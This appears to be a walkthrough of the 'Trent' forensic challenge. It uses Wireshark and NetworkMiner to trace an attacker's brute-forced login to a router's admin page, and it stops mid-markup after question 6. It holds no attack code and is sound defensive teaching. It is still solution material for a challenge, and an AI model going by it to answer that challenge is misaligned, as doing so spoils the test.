Sherlock: Trent Write-Up</strong></p><p><strong>Scenario:</strong></p><p>The SOC team has identified suspicious lateral movement targeting router firmware from within the network. Anomalous traffic patterns and command execution have been detected on the router, indicating that an attacker already inside the network has gained unauthorized access and is attempting further exploitation. You will be given network traffic logs from one of the impacted machines. Your task is to conduct a thorough investigation to unravel the attacker's Techniques, Tactics, and Procedures (TTPs).</p><p><strong>1. From what IP address did the attacker initially launch their activity?</strong></p><p>Load the pcap into NetworkMiner. By checking credentials and host activity, we see that only one host accessed the router.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fHMQ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39b975ba-be95-4884-b421-869e216b35f9_680x72.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fHMQ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39b975ba-be95-4884-b421-869e216b35f9_680x72.png 424w, https://substackcdn.com/image/fetch/$s_!fHMQ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39b975ba-be95-4884-b421-869e216b35f9_680x72.png 848w, https://substackcdn.com/image/fetch/$s_!fHMQ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39b975ba-be95-4884-b421-869e216b35f9_680x72.png 1272w, https://substackcdn.com/image/fetch/$s_!fHMQ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39b975ba-be95-4884-b421-869e216b35f9_680x72.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fHMQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39b975ba-be95-4884-b421-869e216b35f9_680x72.png" width="680" height="72" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/39b975ba-be95-4884-b421-869e216b35f9_680x72.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:72,&quot;width&quot;:680,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!fHMQ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39b975ba-be95-4884-b421-869e216b35f9_680x72.png 424w, https://substackcdn.com/image/fetch/$s_!fHMQ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39b975ba-be95-4884-b421-869e216b35f9_680x72.png 848w, https://substackcdn.com/image/fetch/$s_!fHMQ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39b975ba-be95-4884-b421-869e216b35f9_680x72.png 1272w, https://substackcdn.com/image/fetch/$s_!fHMQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39b975ba-be95-4884-b421-869e216b35f9_680x72.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p><strong>2. What is the model name of the compromised router?</strong></p><p>This requires pivoting into Wireshark. Filter by ip.addr == 192.168.10.1, right-click a packet, and follow the TCP stream. In the router's webpage script, the model name is revealed.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!KSnX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f14f041-9fb9-467f-a195-9dc6adf20801_773x519.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!KSnX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f14f041-9fb9-467f-a195-9dc6adf20801_773x519.png 424w, https://substackcdn.com/image/fetch/$s_!KSnX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f14f041-9fb9-467f-a195-9dc6adf20801_773x519.png 848w, https://substackcdn.com/image/fetch/$s_!KSnX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f14f041-9fb9-467f-a195-9dc6adf20801_773x519.png 1272w, https://substackcdn.com/image/fetch/$s_!KSnX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f14f041-9fb9-467f-a195-9dc6adf20801_773x519.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!KSnX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f14f041-9fb9-467f-a195-9dc6adf20801_773x519.png" width="773" height="519" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6f14f041-9fb9-467f-a195-9dc6adf20801_773x519.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:519,&quot;width&quot;:773,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!KSnX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f14f041-9fb9-467f-a195-9dc6adf20801_773x519.png 424w, https://substackcdn.com/image/fetch/$s_!KSnX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f14f041-9fb9-467f-a195-9dc6adf20801_773x519.png 848w, https://substackcdn.com/image/fetch/$s_!KSnX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f14f041-9fb9-467f-a195-9dc6adf20801_773x519.png 1272w, https://substackcdn.com/image/fetch/$s_!KSnX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f14f041-9fb9-467f-a195-9dc6adf20801_773x519.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>3. How many failed login attempts did the attacker try before successfully logging into the router?</strong></p><p>Filter in Wireshark using ip.src, ip.dst, and http.request.method POST. Inspect each TCP stream to count the failed attempts until the successful login.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3oFR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa21b36-af7f-4d83-a0b5-8712c44c84f4_1079x870.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3oFR!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa21b36-af7f-4d83-a0b5-8712c44c84f4_1079x870.png 424w, https://substackcdn.com/image/fetch/$s_!3oFR!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa21b36-af7f-4d83-a0b5-8712c44c84f4_1079x870.png 848w, https://substackcdn.com/image/fetch/$s_!3oFR!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa21b36-af7f-4d83-a0b5-8712c44c84f4_1079x870.png 1272w, https://substackcdn.com/image/fetch/$s_!3oFR!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa21b36-af7f-4d83-a0b5-8712c44c84f4_1079x870.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3oFR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa21b36-af7f-4d83-a0b5-8712c44c84f4_1079x870.png" width="1079" height="870" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4aa21b36-af7f-4d83-a0b5-8712c44c84f4_1079x870.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:870,&quot;width&quot;:1079,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!3oFR!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa21b36-af7f-4d83-a0b5-8712c44c84f4_1079x870.png 424w, https://substackcdn.com/image/fetch/$s_!3oFR!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa21b36-af7f-4d83-a0b5-8712c44c84f4_1079x870.png 848w, https://substackcdn.com/image/fetch/$s_!3oFR!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa21b36-af7f-4d83-a0b5-8712c44c84f4_1079x870.png 1272w, https://substackcdn.com/image/fetch/$s_!3oFR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa21b36-af7f-4d83-a0b5-8712c44c84f4_1079x870.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>4. At what UTC time did the attacker successfully log into the router's web admin interface?</strong></p><p>From the packet identified in question 3, note the timestamp and convert it to UTC.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!I4TM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe83b04bc-4b27-41d2-a71c-2bc152404496_659x221.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!I4TM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe83b04bc-4b27-41d2-a71c-2bc152404496_659x221.png 424w, https://substackcdn.com/image/fetch/$s_!I4TM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe83b04bc-4b27-41d2-a71c-2bc152404496_659x221.png 848w, https://substackcdn.com/image/fetch/$s_!I4TM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe83b04bc-4b27-41d2-a71c-2bc152404496_659x221.png 1272w, https://substackcdn.com/image/fetch/$s_!I4TM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe83b04bc-4b27-41d2-a71c-2bc152404496_659x221.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!I4TM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe83b04bc-4b27-41d2-a71c-2bc152404496_659x221.png" width="659" height="221" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e83b04bc-4b27-41d2-a71c-2bc152404496_659x221.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:221,&quot;width&quot;:659,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!I4TM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe83b04bc-4b27-41d2-a71c-2bc152404496_659x221.png 424w, https://substackcdn.com/image/fetch/$s_!I4TM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe83b04bc-4b27-41d2-a71c-2bc152404496_659x221.png 848w, https://substackcdn.com/image/fetch/$s_!I4TM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe83b04bc-4b27-41d2-a71c-2bc152404496_659x221.png 1272w, https://substackcdn.com/image/fetch/$s_!I4TM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe83b04bc-4b27-41d2-a71c-2bc152404496_659x221.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>5. How many characters long was the password used to log in successfully?</strong></p><p>This is a trick question. Inspecting TCP streams reveals that no password was entered in the log_pass variable of the POST htm_response_page.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Wp34!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ed178c-4236-4d9f-a592-8772b320a0c8_1023x506.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Wp34!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ed178c-4236-4d9f-a592-8772b320a0c8_1023x506.png 424w, https://substackcdn.com/image/fetch/$s_!Wp34!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ed178c-4236-4d9f-a592-8772b320a0c8_1023x506.png 848w, https://substackcdn.com/image/fetch/$s_!Wp34!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ed178c-4236-4d9f-a592-8772b320a0c8_1023x506.png 1272w, https://substackcdn.com/image/fetch/$s_!Wp34!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ed178c-4236-4d9f-a592-8772b320a0c8_1023x506.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Wp34!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ed178c-4236-4d9f-a592-8772b320a0c8_1023x506.png" width="1023" height="506" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c8ed178c-4236-4d9f-a592-8772b320a0c8_1023x506.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:506,&quot;width&quot;:1023,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Wp34!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ed178c-4236-4d9f-a592-8772b320a0c8_1023x506.png 424w, https://substackcdn.com/image/fetch/$s_!Wp34!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ed178c-4236-4d9f-a592-8772b320a0c8_1023x506.png 848w, https://substackcdn.com/image/fetch/$s_!Wp34!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ed178c-4236-4d9f-a592-8772b320a0c8_1023x506.png 1272w, https://substackcdn.com/image/fetch/$s_!Wp34!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ed178c-4236-4d9f-a592-8772b320a0c8_1023x506.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>6. What is the current firmware version installed on the compromised router?</strong></p><p>Check the AssembledFiles folder in NetworkMiner, specifically adm_status.asp.html. Alternatively, inspect GET requests in Wireshark for adm_status.asp.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!dwVC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fb77ccc-bd6f-486c-a5b8-1a697337aec6_163x27.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!dwVC!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fb77ccc-bd6f-486c-a5b8-1a697337aec6_163x27.png 424w, https://substackcdn.com/image/fetch/$s_!dwVC!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fb77ccc-bd6f-486c-a5b8-1a697337aec6_163x27.png 848w, https://substackcdn.com/image/fetch/$s_!dwVC!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fb77ccc-bd6f-486c-a5b8-1a697337aec6_163x27.png 1272w, https://substackcdn.com/image/fetch/$s_!dwVC!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fb77ccc-bd6f-486c-a5b8-1a697337aec6_163x27.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!dwVC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fb77ccc-bd6f-486c-a5b8-1a697337aec6_163x27.png" width="163" height="27" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5fb77ccc-bd6f-486c-a5b8-1a697337aec6_163x27.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:27,&quot;width&quot;:163,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1047,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!dwVC!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fb77ccc-bd6f-486c-a5b8-1a697337aec6_163x27.png 424w, https://substackcdn.com/image/fetch/$s_!dwVC!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fb77ccc-bd6f-486c-a5b8-1a697337aec6_163x27.png 848w, https://substackcdn.com/image/fetch/$s_!dwVC!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fb77ccc-bd6f-486c-a5b8-1a697337aec6_163x27.png 1272w, https://substackcdn.com/image/fetch/$s_!dwVC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fb77ccc-bd6f-486c-a5b8-1a697337aec6_163x27.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!NS9s!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c0e4e3d-ed16-4d0c-901d-e14db27dd71b_213x268.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!NS9s!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c0e4e3d-ed16-4d0c-901d-e14db27dd71b_213x268.png 424w, https://substackcdn.com/image/fetch/$s_!NS9s!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c0e4e3d-ed16-4d0c-901d-e14db27dd71b_213x268.png 848w, https://substackcdn.com/image/fetch/$s_!NS9s!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c0e4e3d-ed16-4d0c-901d-e14db27dd71b_213x268.png 1272w, https://substackcdn.com/image/fetch/$s_!NS9s!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c0e4e3d-ed16-4d0c-901d-e14db27dd71b_213x268.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!NS9s!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c0e4e3d-ed16-4d0c-901d-e14db27dd71b_213x268.png" width="213" height="268" 